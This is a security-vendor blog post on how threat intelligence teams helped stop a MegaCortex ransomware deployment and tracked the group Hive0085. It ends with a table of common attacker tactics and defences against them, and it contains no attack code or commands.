How Cybersecurity Threat Intelligence Teams Spot Attacks Before They Start


A thorough cybersecurity threat intelligence team can turn a threat into a tool for future protection. Their job is to conduct background research on threat groups’ motivations and capabilities. This way, the intelligence team can be ready to protect an organization with even greater knowledge in the future.

Strong cybersecurity threat intelligence about who attackers are and what they want can help an organization in a critical moment. For example, if an attacker is already on the network, defenders need to act swiftly before significant damage is done. After that critical moment is over, the intelligence gathered in the process means the team can also inject new information into platforms to inform incident response consultants, managed security clients and data.

IBM’s X-Force Incident Response and Intelligence Service analysts have observed many real-world threat groups. Read on to learn the value threat group data brings to the table. Plus, explore some specific actions organizations can take to help defend themselves.

Cybersecurity Threat Intelligence in Action: MegaCortex

Last year, cybersecurity threat intelligence helped stop a MegaCortex ransomware attack before it was executed. In turn, this saved the client organization from damages that had the potential to stretch to $239 million or more. Several threat intelligence insights were able to provide a warning that the attackers were likely preparing for a ransomware attack. The threat intelligence team advised incident responders and the client to remain vigilant. The threat actors could turn destructive if they suspected they had been found. The possibility of these actors deploying ransomware — potentially within hours — was a real threat.

Because of these actions, cybersecurity threat intelligence and preparing for the worst paid off. On a Saturday afternoon, the attacker uploaded MegaCortex ransomware and related deployment tools to one of the compromised systems. Incident response quickly advised the client that this attack was in progress. IBM and the organization executed on our planned containment and eradication items. IBM’s intelligence team had already made maps of the attacker’s command and control infrastructure. This meant they could provide the client with IP addresses, the event’s location on the internet, to block based on observed activity in their environment.

Use Intelligence Now and In The Future

This attempted attack shows how important cybersecurity threat intelligence can be for incident response. Knowing the attacker’s intentions, capabilities, next moves, command and control infrastructure, malware capabilities and indicators of compromise (IOCs) played a pivotal role in keeping the incident response team and the client on top.

In addition, greater intelligence in an incident response practice allows for ongoing research and awareness. In this case, the cybersecurity threat intelligence team has been able to warn additional organizations about MegaCortex attack techniques, such as malicious outbound communications, Cobalt Strike and lateral movement.

Other Ransomware Attack Patterns

In addition to MegaCortex, X-Force incident response teams have also observed multiple ransomware attackers at work over the past several years. One common ransomware technique observed multiple times over the past year includes an initial compromise of a Citrix server — usually using previously stolen credentials. Next, it uses Powershell and Cobalt Strike in conjunction with lateral movement before deploying ransomware.

In two particular incidents, the malware, IOCs and other artifacts in these attacks were so similar that our team was able to quickly replicate our analysis and fix problems faster. This is an excellent example of the power of cybersecurity threat intelligence because the knowledge we gained from one incident helped us analyze and remediate other incidents involving similar techniques.

Tracking Hive0085

Cybersecurity threat intelligence teams should conduct extensive research on several cybercriminal groups using multiple tools and methods. IBM does this by investigating their malicious campaigns using a variety of open, enterprise and IBM tools and repositories. IBM also tracks sales and activities on the dark web, using Quad9 to track malicious IPs and domains associated with threat groups we follow.

In one particular instance, IBM saw that group Hive0085 purchased several command and control domains for a backdoor on the dark web called ‘more_eggs.’ Using data available to IBM through Quad9, we noticed this command and control network was very active, suggesting the group was engaged in an ongoing campaign. We were able to use this data to alert the victim to an active campaign against their network. Because of this, organization’s team had valuable time to identify and try to stop this group. The information we had cultivated over months of research and our proactive approach allowed us to provide timely, actionable intelligence for the company in a critical moment.

Teaching Cybersecurity Threat Intelligence In Your Business

Researching threat actors and their techniques means we know how these threat groups behave and the tactics they are most likely to use. Here are some of the more common tactics, techniques and procedures we observe advanced persistent threat groups using. You’ll also find strategies to help combat these tactics and mitigate risk from these top-tier actors along with using a cybersecurity threat intelligence team.

Tactic, Technique or Procedure Risk Mitigation Tactics
Spear phishing: Of the threat groups we track, nearly 84% use phishing as an infection vector. Of those, 64% appear to use it as their primary infection vector. Apply banners to emails coming from outside your company; use Quad9 to block activity from malicious domains; employ multifactor authentication; educate employees on the latest phishing techniques; and regularly test your organization to determine the likelihood of a successful phishing attack.
Watering hole attacks: Nearly 27% of the advanced persistent threat groups we track use watering hole techniques. Take measures to hide your organization’s online activities through the use of a virtual private network (VPN) or other measures; employ a robust patch management program to keep software up to date; and detect anomalous behavior through user behavior analytics or an intrusion prevention system.
Living off the land: Multiple threat groups use tools inherent in an operating system, such as Powershell, adfind, autorun registry entries, RemoteExec, WinRAR, WMI, scheduled tasks and others. Use an application inventory to find unpatched or outdated applications; employ a robust endpoint detection and response (EDR) tool; monitor for typical commands threat actors use to execute Powershell; and use threat hunting to proactively identify threats in your network.
Zero-day exploits: At least 23% of the threat groups we track are known to use zero-day exploits to compromise victims Analyze user behavior to detect strange behavior resulting from a zero-day exploit and stay up to date on new types of threats and patches to mitigate the risk once it is detected.

Embedding Intelligence Into Security

Organizations can include cybersecurity threat intelligence in their risk management models to consider likely threat actors, infection methods and likely impacts. Understanding where threats are likely to come from teaches an organization to prioritize identifying threat sources and threat events with up-to-date information about threat groups’ tactics. In addition, this intelligence can be incorporated into incident response plans and used to inform senior leaders and board members about key threats.

There are several ways companies can request custom cybersecurity threat intelligence research and analysis. First, a strategic threat assessment can provide customized cybersecurity threat intelligence for one organization. Next, the company could function as part of an incident response retainer and intelligence accessed through data sharing platforms such as TruSTAR. Having knowledge of threat groups, what they want and what they can do can improve your security team’s effectiveness today and tomorrow.

The post How Cybersecurity Threat Intelligence Teams Spot Attacks Before They Start appeared first on Security Intelligence.